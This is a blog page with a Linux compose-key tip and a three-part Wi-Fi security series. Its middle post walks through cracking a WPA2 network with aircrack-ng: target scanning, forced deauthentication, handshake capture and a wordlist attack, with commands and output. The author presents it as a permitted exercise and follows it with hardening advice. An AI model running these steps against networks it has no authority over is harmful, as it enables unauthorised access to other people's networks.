I was recently faced with providing foreign language accent characters in Linux. Most word processors allow you to do this graphically -- via the Insert / Special Characters function in LibreOffice or OpenOffice, for example -- but this soon gets tedious for anything but the occasional insert. Doing it straight from the keyboard would be considerably quicker...

There are a number of ways to achieve this in Linux. Here's what I reckon's the easiest.

Open a console session and type:

setxkbmap -option compose:ralt

And that's it! What you've done is assign a special Linux key called <compose> to the right-hand ALT key -- that's the one to the right of the Spacebar. (You could of course assign it to any key you like, but personally I never use "ralt".)

Now, hold down the <compose> key and type <`> followed by <e> and you get an accented è (that's the grave accent), while <compose> + <'> + <e> yields é (with an accute accent).

Note that you can use these keys in any application. And that's just the beginning!

Using <compose> you can generate hundreds of different symbols. To get an idea of the possibilities, take a look at the file /usr/share/X11/locale/en_US.UTF-8/Compose.

Here's just a few of the characters you can create straight from the keyboard. (I've rendered them in a large font so they display better.)

   ÷   ©   ®
   ô   ø   µ
   å   ♥   ¶
   £   €   ¥
   ₨   ß   ç
   ň   ŋ   ƶ
   à  ±   ☭

And here are the key combinations I used to create them:

<compose> + <:> + <->
<compose> + <o> + <c>
<compose> + <o> + <r>

<compose> + <^> + <o>
<compose> + </> + <o>
<compose> + <m> + <u>

<compose> + <o> + <a>
<compose> + <?> + <!>
<compose> + <<> + <3>

<compose> + <P> + <P>
<compose> + <l> + <->
<compose> + <e> + <=>

<compose> + <y> + <=>
<compose> + <R> + <s>
<compose> + <s> + <s>

<compose> + <,> + <c>
<compose> + <c> + <n>
<compose> + <n> + <g>

<compose> + </> + <z>
<compose> + <_> + <A>
<compose> + <+> + <->
<compose> + <C> + <C> + <C> + <P>


(And in case you're wondering about this column's title, it's a subtle homage to a certain Monty Python classic...)

Posted by Geoff Palmer at 3:08 AM | Permalink | Comments ( 0 )

Part III: Securing Your Wireless Network

Wireless networks are wonderfully convenient but, as we've seen, they're also vulnerable to being hacked. Here's how to make it hard for hackers!

Essential Measures

1. Use a proper password
What makes a good password? Anything that's not in a dictionary for a start! If you want to use something memorable, think passphrases rather than passwords. "2 bee 0r NoT two-B" is vastly more secure than "To be or not to be", but for real security you can't beat long strings of properly randomised junk. How about

bT6i3W429TQRxnefaD1xtZc3b6kgit2eMbk52S0ndK1Km5upS2AI9iakyTZIvqt

or

<CL$8L=noSj+^1)5<4LTaB7#R%PHH2-204V^_fj.@t:%kpsO0p,vJOS8<-qEOm^

Now they're what I call passwords! Both come from Steve Gibson's Perfect Passwords generator. You don't have to use the whole string. Just the first 10-12 characters would do. If you do use the whole string, you'll need to save it on a USB stick which makes it a little less convenience, but no one's ever likely to crack your network.


2. Change the default password
Don't let a hacker reconfigure your hardware! Your wireless router will come with a default password. Change it! There are plenty of lists around (like this one) containing default logins and passwords.


3. Enable encryption
Without encryption, anyone can capture your wireless traffic! Use WPA2 in preference to WPA. Don't ever use WEP, it can be cracked in minutes.


4. Update your firmware
Things change, new vulnerabilities are discovered daily. Check your router's running the latest firmware update.


5. Use HTTPS for management
If you manage your router wirelessly, do so via (encrypted) HTTPS rather than regular HTTP. With the latter, your router's login name and password will be broadcast in clear text.

Useful Measures

6. Disable SSID
Disabling the SSID (Service Set Identifier) will essentially hide your network from casual passers-by. Experienced hackers will still easily detect it, but it requires a little extra work and suggests its owner has a little extra savvy, so they may go for an easier target.


7. Turn on logging
Router logs are often disabled by default. Turn them on. Some routers will even email you of suspicious activity. Invaluable!


8. Switch it off!
If you're going away for a while, turn off your router -- or at least the switch off Wi-Fi. If it ain't broadcasting, it can't be hacked!

Not So Useful Stuff

9. Filter MAC addresses
Every piece of networked equipment has a unique Media Access Control (MAC) address, and at first it would seem to be a good idea to only allow access to particular devices. But the internal tables are a pain to maintain -- you'll have to determine and add the MAC address of every new piece of equipment you connect -- and they're trivially easy to spoof anyway, so Not So Useful.


10. Disable DHCP
Again, I put this in the Not So Useful category merely because it's a pain to maintain. With
Dynamic Host Control Protocol (DHCP) enabled, new devices are automatically assigned IP addresses. With it disabled, they have to be assigned manually. For most casual users that's just a hassle.

Posted by Geoff Palmer at 6:04 PM | Permalink | Comments ( 0 )

Part II: The crack

Having assembled the tools, it's time to get to cracking. Literally!

Note: The network I cracked belonged to a friend. I did so with his permission, purely as a security exercise. Using these tools for any other purpose is probably illegal! Also note that in the examples that follow I've randomly altered network names and MAC addresses.

(I used the Slitaz Live Aircrack-ng Distribution on a USB stick for this attack. It's Linux, of course, so if you're running from Windows, the command syntax may be slightly different.)



1. Start monitor mode
Aircrack-ng is a suite of command-line tools, so open up a console window.

The first step is the critical one. You need to turn your wirelss card into monitor mode:

airmon-ng start wlan0

Here's what that yielded on my laptop:

Interface       Chipset          Driver wlan1           Broadcom         b43 - [phy0] wlan0           Realtek RTL8187L rtl8187 - [phy1]                                  (monitor mode enabled on mon0)

Success! But only on the USB wireless card. The laptop's built-in Broadcom card may work with a driver, but that could require a lot more work.



2. Scan for targets
Okay, let's see what networks are out there that we can monitor ...

airodump-ng mon0

Airodump-ng is a wireless packet capture tool that details all the access points and clients within range.

BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH  ESSID                      00:16:50:59:52:9C  -50       63        1    0   6  54e  WPA  TKIP   PSK  Scuba  00:22:75:31:11:5A  -51       32        3    0   1  54e  WPA2 CCMP   PSK  MyNetwork  00:12:34:56:98:AB  -53       47        2    0   3  54e. WPA2 CCMP   PSK  Target_Net  00:11:95:DD:8D:99  -60       16        2    0   1  54   WEP  WEP         Private Network  00:22:74:52:86:3F  -61       28       16    0   7  54e  WPA2 CCMP   PSK  Belkin_N_Wireless_02843F  00:02:63:50:20:22  -61       30       43    0   9  11 . OPN              OpenNet    BSSID              STATION            PWR   Rate    Lost  Packets  Probes  00:12:34:56:98:AB  00:11:EF:8B:62:77  -39    0 -36e     0        6  Target_Net

Hit Ctrl+C to stop the capture and note the target's Channel number and BSSID for input into the next step. (Note that I'm targeting a WPA2 network. That WEP would just be too easy!)



3. Begin the capture
We now want to capture just the data going to a particular target. We do so using the following syntax:

airodump-ng -c (channel) -w (name of the capture file) --bssid (bssid) mon0

So targeting Target_Net (above) would give us ...

airodump-ng -c 3 -w Test_Data --bssid 00:12:34:56:98:AB mon0

CH  3 ][ Elapsed: 4 mins ][ 2011-10-04 21:42 ]  BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID  00:12:34:56:98:AB  -51  64     1746     9642    0   3  54e. WPA2 CCMP   PSK  Target_Net  BSSID              STATION            PWR   Rate    Lost  Packets  Probes  00:12:34:56:98:AB  00:11:EF:8B:62:77  -38   24e-24e   115     9701  Target_Net

Now we can simply wait for a WPA handshake to occur, or we can try and push things along.



4. (Optional) Forcing a handshake
Open a new console window while the first continues running and use aireplay-ng to inject packets into the network to de-authenticate the client. When you do so, the client will re-authenticate via a WPA handshake, and that's exactly what we want!

aireplay-ng -0 3 -a 00:12:34:56:98:AB mon0

There are tons of options with aireplay-ng, but -0 3 (send three de-authentications) worked for me ...

21:43:34  Waiting for beacon frame (BSSID: 00:12:34:56:98:AB) on channel 3 NB: this attack is more effective when targeting a connected wireless client (-c <client's mac>). 21:43:34  Sending DeAuth to broadcast -- BSSID: [00:12:34:56:98:AB] 21:43:35  Sending DeAuth to broadcast -- BSSID: [00:12:34:56:98:AB] 21:43:35  Sending DeAuth to broadcast -- BSSID: [00:12:34:56:98:AB]

How do you know if it worked? Check the top right-hand corner of the first console and you should see confirmation.

CH  3 ][ Elapsed: 5 mins ][ 2011-10-04 21:43 ][ WPA handshake: 00:12:34:56:98:AB  BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID  00:12:34:56:98:AB  -51  64     1746     9642    0   3  54e. WPA2 CCMP   PSK  Target_Net  BSSID              STATION            PWR   Rate    Lost  Packets  Probes  00:12:34:56:98:AB  00:11:EF:8B:62:77  -38   24e-24e   115     9701  Target_Net

5. Apply a little brute force
We have all the data we need, now it's just a matter of (hopefully) cracking the password. Locate the file where you saved the data in Step 3, the password wordlist you downloaded last time, and run them through aircrack-ng. The format is;

aircrack-ng -w(dictionary file) (data file)

You'll see that Step 3's saved several files with different extensions. The one aircrack-ng needs is the .cap file, so in my case I run ...

aircrack-ng -w wordlist.txt Test_Data.cap

Now it's just a matter of waiting while aircrack-ng tries the possible password combinations.

Aircrack-ng 1.1 r1904                    [00:32:51] 850148 keys tested (455.42 k/s)                            KEY FOUND! [ swedishchef ]       Master Key     : 80 FD 4C 4D 72 34 5F 08 83 67 A0 E5 D3 73 06 EB                        6B 9F D6 2D AA E4 EC C2 24 7D F7 D3 EF A7 6E FE       Transient Key  : 97 13 7B FF DF 0A 29 07 85 3A 0F FA FC 4D 62 92                        14 F8 33 9B 67 01 08 B3 DE 21 49 B9 53 F7 D9 FF                        18 9A BA 40 B6 A3 2D 92 CB 27 A7 7A EE F6 7A F0                        21 52 8E 50 00 14 35 F8 4A 0A 5D 49 BC 15 E2 08       EAPOL HMAC     : 85 31 D0 6F 21 8F D7 7A D9 FA EF F1 66 4B 5A B2

Bingo! And there's our password. Simple as that!



So what can you do to maximise your security and prevent hacks like this? Read Part III, coming soon...!

Posted by Geoff Palmer at 11:01 PM | Permalink | Comments ( 0 )

Part I: Assembling the tools

Wireless networks are everywhere, but many are insecure. The older WEP protocol has been thoroughly compromised and most users rely on the more robust WPA protocol. But a chain is only as strong as its weakest link, and that weak link is invariably the password used to secure the network. So I decided to try a little wi-fi cracking to see how easy it is ...

Wow! In little over an hour I went from neophyte to bona fide cracker, my first pwned network under my belt. It's disturbingly simple. Here's how I did it ...

Note: The network I cracked belonged to a friend. I did so with his permission, purely as a security exercise. Using these tools for any other purpose is probably illegal!

The basic toolset consists of three parts:

1. aircrack-ng
2. a wordlist
3. a suitable wireless receiver

First, the easy stuff ...


The Software
Aircrack-ng isn't a single program, it's a suite of more than a dozen tools for auditing wireless networks. It runs under Linux and Windows, there's a version for VMWare virtual machines, and even a proof-of-concept version for the iPhone.

Linux users can install the whole suite by simply selecting "aircrack-ng" from their distribution's repository. Other users can download the latest from aircrack-ng's site.

Another alternative is to download the ready-built Slitaz Live Aircrack-ng Distribution. It's a bootable Linux CD with aircrack-ng built in.

The other piece of software you'll need is a password wordlist. The way WPA cracking works is to take one word at a time from the wordlist and try it in various common combinations to see if its encoded form matches what's been captured. If this sounds slow and laborious, it is, but it's the sort of thing that computers excel at. Depending on your processor, it's possible to test many thousands of combinations per second.

Googling for "wordlists" will turn up dozens, in many different languages. I settled for the English dictionary from this collection. It contains a modest 300,000 possible passwords in a 1MB file. Obviously, the bigger the wordlist, the more likely you are to crack the password. If you're really keen, there's the Openwall Wordlist Collection, a 33GB whopper that costs around US$30.


The Hardware
To begin cracking you'll also need a suitable network card, one that can be flipped into what's known as "monitor mode". The aircrack-ng website has a useful tutorial here: Is My Wireless Card Compatible?

If you do have a compatible card, use their Compatibilty Drivers to see if aircrack-ng will work okay with it, and what drivers you'll need, if any.

If all that sounds a bit daunting, you can simply buy a suitable USB network card and bypass the one in your PC. What is the Best Wirelss Card to Buy? will help. I picked up a USB-based RTL8187L device for a little over $20.



We're now ready for the fun stuff. Part II coming soon ...!

Posted by Geoff Palmer at 10:02 AM | Permalink | Comments ( 0 )